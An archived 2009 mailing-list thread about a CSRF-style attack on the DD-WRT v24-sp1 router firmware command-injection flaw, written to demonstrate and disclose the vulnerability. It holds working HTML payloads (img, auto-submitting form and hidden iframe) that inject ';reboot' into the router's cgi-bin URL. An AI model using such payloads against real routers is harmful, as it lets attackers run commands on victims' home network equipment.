PaulDotCom mailing list archives
DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 )
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Sat, 25 Jul 2009 21:51:03 -0400
I'm glad you approve, and thanks for letting us know about the exploit via the recent podcast. I don't follow the latest vulnerability as well as I should. Adrian On Sat, Jul 25, 2009 at 8:59 PM, Carlos Perez <carlos_perez at darkoperator.com
wrote:
Only thing I can say You ROCK!!!!!' dude Sent from my iPhone On Jul 25, 2009, at 5:35 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote: I heard Carlos talk about it, so I started to work on a writeup, which I'll post to my site shortly.* Carlos, thanks for the idea. * I was interested in giving a reall world example of a CSRF attack, similar to the ones I mentioned in my OWASP Top 5 video<http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville>, and maybe use it against a piece of internal equipment that is behind a NAT box. Then I heard about Carlos Perez write-up<http://www.darkoperator.com/blog/2009/7/21/using-metasploit-dd-wrt-exploit-module-thru-pivot.html>on using Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware. I thought this would be a great way to demo the concept of using CSRF/XSS against hardware behind a NAT, especially since I've done a video on installing DD-WRT before<http://www.irongeek.com/i.php?page=videos/intro-to-dd-wrt-mod-your-wireless-router-to-do-more>. Some people thing it's not a big deal since the attack request has to come from an internal source, but they don't think about the fact that CSRF can make the attack come from an internal source. Granted, this may not be considered a true CSRF from the stand point that you don't have to have authenticated against your DD-WRT v24-sp1 router, but it works much the same way. Carlos' demo shows using Metasplot to open a shell on the router, then do some other messing around, I'll just show how this vulnerability could be used to reboot the router just using html (there are far more deviant things you could do). For the most part this attack essentially amounts to pointing the browser at <http://ip-of-router/cgi-bin/>http://ip-of-router/cgi-bin/* ;*some-command . Since the default IP for most home NAT routers is 192.168.1.1, this is a pretty easy attack that could be pulled off against people who browse a page that the attacker controls. The attacker would not have to explicitly have the victim go to <http://ip-of-router/cgi-bin/> http://ip-of-router/cgi-bin/*;*some-command to pull off the attack, there are plenty of ways to make a browser automatically make the reques, for example: * * *IMG get:* <img src=*" <http://192.168.1.1/cgi-bin/;reboot> http://192.168.1.1/cgi-bin/;reboot"*> * * *Post method:* <form name=*"csrfform"* method=*"post"* action=*"<http://192.168.1.1/cgi-bin/;reboot> http://192.168.1.1/cgi-bin/;reboot"*>* *<input type=*'hidden'* name=* 'input_from_form'* value=*"Test of of auto submitted form."*>* *</form>* * <script> document.csrfform.submit*()* </script>* * *IFRAME Get:* <iframe src=*" <http://192.168.1.1/cgi-bin/;reboot> http://192.168.1.1/cgi-bin/;reboot"* style=*"width:0px; height:0px; border: 0px"*></iframe> If you would like to test this code against your DD-WRT v24-sp1 click the link below: DD-WRT test page, only click if you want your router to reboot<http://www.irongeek.com/security/ddwrttest-only-click-if-you-want-your-router-to-reboot.htm> For information on the fix: <http://www.dd-wrt.com/>http://www.dd-wrt.com Guess its time to patch. _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: <http://pauldotcom.com>http://pauldotcom.com _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090725/e4bb2dc7/attachment.htm
Current thread:
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Adrian Crenshaw (Jul 25)
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Carlos Perez (Jul 25)
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Adrian Crenshaw (Jul 25)
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Carlos Perez (Jul 25)